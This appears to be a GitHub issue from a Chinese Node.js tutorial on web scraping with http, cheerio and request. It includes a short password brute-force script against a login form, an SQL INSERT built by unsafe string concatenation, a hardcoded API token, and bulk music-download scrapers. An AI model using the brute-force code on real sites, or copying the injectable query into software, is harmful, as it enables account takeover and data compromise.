Wscats/node-tutorial

node原生模块爬虫和request爬虫方案

Wscats opened this issue · 5 comments

原生模块爬虫

//原生http模块,用于请求文件或者创建服务器
var http = require("http");
//原生fs模块,用于读写文件
var fs = require("fs")
//调用cheerio模块,类似于jquery
var cheerio = require("cheerio")
//调用mysql第三方模块
var mysql = require("mysql")
//进行数据库连接
var connection = mysql.createConnection({
	host: 'localhost', //localhost
	user: 'test',
	password: '123456789',
	database: 'laoyao'
});

//执行连接
connection.connect();
//此函数用于获取需要被爬虫的网页DOM结构
function download(url, callback) {
	http.get(url, function(res) {
		var data = "";
		res.on('data', function(chunk) {
			data += chunk
		})
		res.on('end', function() {
			callback(data);
		})
	})
}

download("http://www.mmjpg.com/", function(data) {
	//将网页信息交给cheerio处理,类似于jquery处理DOM结构
	var $ = cheerio.load(data);
	var imgArr = [];
	//遍历图片信息,并执行存储
	$('img').each(function(index, ele) {
		var src = $(ele).attr("src");
		//把数据插入到数据库
		connection.query('INSERT INTO `meizi`(`src`) VALUES ("' + src + '")', function(error, results, fields) {
			if(error) throw error;
		});
		imgArr.push(src);
	})
	//执行下载图片
	downloadImg(imgArr)
})
var i = 0;
function downloadImg(imgArr) {
	var lenth = imgArr.length;
	var writerStream = fs.createWriteStream('img/'+i+'.jpg');
	http.get(imgArr[i], function(res) {
		res.pipe(writerStream);
		if(i<lenth){
			i++;
			//递归执行图片下载,确保每一张图片下载完再下载下一张
			downloadImg(imgArr)		
		}else{
			return;
		}
	})
}

注意要遍历生成多个写入流,不然有可能下载文件写入不成功

for(let i = 0; i < imgs.length; i++) {
	var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
	download(imgs, i, imgStream)
}

完整代码,记得创建img文件夹

var http = require("http");
var fs = require("fs");
//类似于 jQ
const cheerio = require("cheerio");
const queryStr = require("querystring");
var postData = queryStr.stringify({
	"msg": "Hello!"
})
//发送http的 request 请求
var request = http.request({
	hostname: "www.ivsky.com",
	port: 80,
	method: "POST",
	headers: {
		'Content-Type': 'application/x-www-form-urlencoded',
		'Content-Length': postData.length
	}
}, function(response) {
	var datas = "";
	var imgs = [];
	response.on("data", function(chunk) {
		datas += chunk;
	})
	response.on("end", function() {
		const $ = cheerio.load(datas);
		$("img").each(function(idx, dom) {
			imgs.push($(dom).attr("src"))
		})
		// 遍历创建对应的 可写流
		for(let i = 0; i < imgs.length; i++) {
			var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
			download(imgs, i, imgStream)
		}
	})

})
request.on("error", function(err) {
	console.log('problem with request: ' + err.message)
})
request.write(postData)
request.end();

function download(imgs, i, imgStream) {
	http.get(imgs[i], function(res) {
		res.pipe(imgStream);
	})
}
//注意加end方法 结束请求
//req.end()必须被调用,即使没有在请求体内写入任何数据
//也必须调用。因为这表示已经完成HTTP请求

在pipe之前添加on('error',fn)可以监听错误,在后面添加on('close',fn)可以监听完成

var s = fs.createWriteStream(`./images/${f}/${i}`)
request(url).on('error', (err) => {
	console.log(err)
}).pipe(s).on('close', () => {
	console.log('成功!')
})

参考文档

安装并引用request模块

官方详细文档

const request = require('request');

详细配置的写法

request({
	method: 'GET',
	url: 'https://xxx/config/all',
	headers: {
		'Host': 'api.veilpark.com',
		'mid': '8678385b7d1eb259377973ee02cd9d52618fc0f7',
		'Accept': '*/*',
		'Authorization': 'token 40101431f0c64e83839a56c2069b1a63jcrk8on1',
		'Proxy-Connection': 'keep-alive',
		'Accept-Language': 'zh-Hans;q=1',
		'cversion': '4400',
		'Content-Type': 'application/json',
		'User-Agent': 'maskpark/4.4 (iPhone; iOS 9.3.1; Scale/2.00)',
		'Connection': 'keep-alive',
		'client': 'ios'
	},
        form:{}
}, (error, response, body) => {
	if(!error && response.statusCode == 200) {
		var info = JSON.parse(body);
		console.log(info);
	} else {
		console.log("请求出错");
	}
})

网页暴力破解

const request = require('request');
const async = require('async');
async.each(
	//密码字典
	['1', '2', '3'],
	(item, callback) => {
		hack(item, function() {
			callback(null)
		})
	},
	() => {
		console.log('done');
	}
);

function hack(password, cb) {
	request({
		method: 'POST',
		url: 'http://xxx/login',
		headers: {
			'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
		},
		form: {
			'AdminName': 'xxxx',
			'PassWord': password
		}
	}, (error, response, body) => {
		if(body) {
			console.log("破解失败", "无可用密码");
		} else {
			console.log("破解成功", password);
		}
		cb()
	})
}

其他可以做的思路

酷狗批量下载音乐

参考1

var request = require('request');
var cheerio = require('cheerio');
var fs = require('fs');
request('http://www.kugou.com/yy/singer/home/3060.html', function(error, response, body) {
	//console.log(body)
	var $ = cheerio.load(body);
	var arr = $('.song_hid');
	//console.log(arr);
	for(var num = 0; num < arr.length; num = num + 1) {
		console.log($(arr[num]).attr("value"));
		//计算字符串的长度
		console.log($(arr[num]).attr("value").length);
		var length = $(arr[num]).attr("value").length;
		//找出第一个|的位置在哪里
		console.log($(arr[num]).attr("value").indexOf("|"));
		var index = $(arr[num]).attr("value").indexOf("|");
		console.log($(arr[num]).attr("value").substring(index + 1, length - 7))
		var hash = $(arr[num]).attr("value").substring(index + 1, length - 7);
		request('http://www.kugou.com/yy/index.php?r=play/getdata&hash=' + hash, function(error, response, body) {
			console.log(JSON.parse(body).data.play_url);
			var mp3 = JSON.parse(body).data.play_url;
			var audio_name = JSON.parse(body).data.audio_name;
			request(mp3).pipe(fs.createWriteStream(audio_name + '.mp3'));
		});
	}
})

参考2

//1.爬取歌手网页
//2.分析网页,并获取该歌手所有歌曲的id
//3.根据id来拼接url,获取歌曲的下载地址
//4.执行下载
var request = require("request");
var cheerio = require("cheerio");
var fs = require("fs");
var mysql = require('mysql');
var connection = mysql.createConnection({
	host: 'localhost',
	user: 'wscats',
	password: '123456',
	database: 'kugou'
});
connection.connect(); //进行连接
request("http://www.kugou.com/singer/3060.html", (err, res, body) => {
	//console.log(body)
	var $ = cheerio.load(body);
	var arr = $(".song_hid");
	$(".song_hid").each(function(i, e) {
		console.log($(e).attr("value").split("|")[1]);
		var link = $(e).attr("value").split("|")[1];
		var name = $(e).attr("value").split("|")[0];
		request(`http://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=${link}`, function(err, res, body) {
			if(body) {
				var url = JSON.parse(body).data.play_url;
				console.log(url);	
				connection.query('INSERT INTO song SET ?', {
					name: name,
					url: url
				}, function(error, results, fields) {
					if(error) throw error;
					console.log(results);
				});
				//connection.end();
			}
			//request(mp3).pipe(fs.createWriteStream(name + '.mp3'));
		})
	})
})

原生http.request模拟客户端请求

const http = require('http');
const querystring = require('querystring');
const postData = querystring.stringify({
    'msg': 'helloworld'
});

const options = {
    hostname: 'localhost',
    port: 8877,
    path: '/',
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': Buffer.byteLength(postData)
    }
};
const req = http.request(options, (res) => {
    console.log(`状态码: ${res.statusCode}`);
    console.log(`响应头: ${JSON.stringify(res.headers)}`);
    res.setEncoding('utf8');
    res.on('data', (chunk) => {
        console.log(`响应主体: ${chunk}`);
    });
    res.on('end', () => {
        console.log('响应中已无数据');
    });
});

req.on('error', (e) => {
    console.error(`请求遇到问题: ${e.message}`);
});

// 将数据写入请求主体。
req.write(postData);
req.end();

原生http.creatrServer创建服务器

const http = require('http');
const fs = require('fs');
http.createServer((req, res) => {
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept');
    req.pipe(res);
}).listen(8877);